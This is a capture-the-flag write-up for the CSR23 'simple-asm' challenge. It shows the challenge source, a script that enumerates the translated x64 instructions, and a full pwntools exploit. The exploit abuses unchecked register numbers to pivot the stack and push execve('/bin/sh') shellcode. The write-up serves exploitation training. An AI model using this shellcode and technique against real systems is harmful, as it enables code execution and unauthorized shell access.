CSR23 simple-asm Shellcode Challenge
Solution to the Cyber Security Rumble Finals challenge simple-asm.
The challenge is strait forward. It defines an custom set of instructions, that get translated to x64 instructions directly and are then executed at a fixed offset, in a no-PIE binary. The translation lacks checks, such that the instructions do more than they should at first sight, when using specific higher register.
This is the provides challenge source code, also running on the remote instance:
import os
import struct
import sys
def main():
print("Input your code, followed by END", flush=True)
# Read in code
source = []
while True:
line = input()
# Break at end
if line == "END":
break
source.append(line)
# Compile and execute code
code = compile_asm(source)
print("Executing code", flush=True)
execute_shellcode(code)
def compile_asm(source):
code = b""
for line in source:
# Skip empty lines and comments
if not line:
continue
if line.strip().startswith("#"):
continue
# Split into mnemonic and operands
instr, regs = line.split(maxsplit=1)
regs = [parse_reg(r) for r in regs.split(",")]
# Generate machine code
match instr, regs:
case "nul", [reg]:
code += bytes([0x48, 0x31, 0xC0 | reg | (reg << 3)])
case "inc", [reg]:
code += bytes([0x48, 0xFF, 0xC0 | reg])
case "add", [reg_dst, reg_src]:
code += bytes([0x48, 0x01, 0xC0 | reg_dst | (reg_src << 3)])
case _:
print(f"Unknown instruction: {line}", flush=True)
sys.exit()
return code
def parse_reg(reg):
# Parse register number
reg = reg.strip()
assert reg.startswith("r")
return int(reg[1:])
def execute_shellcode(code):
# Align code to multiple of page size
if len(code) % 0x1000:
code += b"\xcc" * (0x1000 - (len(code) % 0x1000))
# Build ELF file in memory
elf = b""
# ELF header
elf += b"\x7fELF\x02\x01\x01\x03\0\0\0\0\0\0\0\0\x02\0\x3e\0\x01\0\0\0\0\0\0\x01\0\0\0\0\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\0\x38\0\x01\0\0\0\0\0\0\0"
# Program header
elf += b"\x01\0\0\0\x07\0\0\0\0\x10\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\x01\0\0\0\0"
elf += struct.pack("<Q", len(code)) * 2
elf += b"\0\x10\0\0\0\0\0\0"
# Pad to whole page
elf = elf.ljust(0x1000, b"\0")
# Shellcode
elf += code
# Put ELF into memfd
memfd = os.memfd_create("sc")
f = os.fdopen(memfd, mode="wb")
f.write(elf)
f.flush()
# Execute memfd
os.execve(memfd, ["sc"], {})
print("execve failed!", flush=True)
if __name__ == "__main__":
main()
To know what we are working with, this script enumerates all pairs of “simple-asm” instruction to x64 instruction:
import pwn
from itertools import permutations
from typing import Iterable, Callable, Tuple
pwn.context.update(arch='amd64')
def nul(reg: int) -> bytes:
return bytes([0x48, 0x31, 0xC0 | reg | (reg << 3)])
def inc(reg: int) -> bytes:
return bytes([0x48, 0xFF, 0xC0 | reg])
def add(reg_src: int, reg_dst: int) -> bytes:
return bytes([0x48, 0x01, 0xC0 | reg_dst | (reg_src << 3)])
byte = range(0x100)
def try_all(func: Callable) -> Iterable[Tuple[list, bytes]]:
num_params = func.__code__.co_argcount
for i in permutations(byte, num_params):
try:
disasm = pwn.disasm(func(*i))
if '(bad)' not in disasm:
yield i, disasm
except ValueError:
pass
for i in try_all(nul):
print(i)
for i in try_all(inc):
print(i)
for i in try_all(add):
print(i)
From the output of script we can see that we have xor rXX, rYY
, inc rXX
, dec rXX
, rex.W call rXX
, rex.W jmp rXX
, rex.W jmp rXX
, rex.W push rXX
and add rXX, rYY
.
This is a lot to work with, especially since we are running in a no-PIE binary, that has rwx memory.
The plan for exploitation is the following:
First, we build a primitive to write an arbitrary value in any register.
This is done by setting another register say rbx
one by:
nul r11 # xor rbx, rbx
inc r3 # inc rbx rbx = 1
and then doubling it 64 times.
Each time i
checking if the value we want to write has a 1 at bit i
.
If so we add rbx
, that at this point is 1 << i
, to the target register.
Second, we set rsp
into an executable area.
Next, we push the shellcode in pieces of eight bytes backwards on our pivoted stack, by constructing the address in an register with our first primitive.
Last, we just need to jump to our shellcode by calling rsp
.
We could optimize this at multiple points, e.g. by filling all registers at once, but size or execution time is not a concern of this challenge
Here is the full exploit:
import pwn
from typing import List
pwn.context.update(arch='amd64')
def get_shellcode() -> List[int]:
# short shellcode
asm = b"j;X\x99H\xbb/bin//shRST_RWT^\x0f\x05"
# shellcode as eight byte ints
shellcode = [int.from_bytes(asm[i:i + 8],
byteorder='little',
signed=False)
for i in range(0, len(asm), 8)]
return shellcode
def stackpivot() -> str:
sc = 'nul r4\n' # xor rsp, rsp
sc += 'inc r4\n' # xor rsp, rsp
gadget = 'add r36, r0\n' # add rsp, rsp
for i in range(24):
sc += gadget
for i in range(500):
sc += 'inc r4\n' # inc rsp
return sc
sc = stackpivot()
for inst in get_shellcode()[::-1]:
sc += 'nul r11\n' # xor rbx, rbx
sc += 'inc r3\n' # inc rbx (rbx = 1)
sc += 'nul r13\n' # xor rbp, rbp
for i in range(64):
if inst & (1 << i):
sc += 'add r29, r0\n' # add rbp, rbx
sc += 'add r27, r0\n' # add rbx, rbx
sc += 'inc r53\n' # push rbp
sc += 'inc r228\n' # call rsp
sc += 'END\n'
p = pwn.process(['python3', 'simple_asm.py'])
p.send(sc)
p.interactive()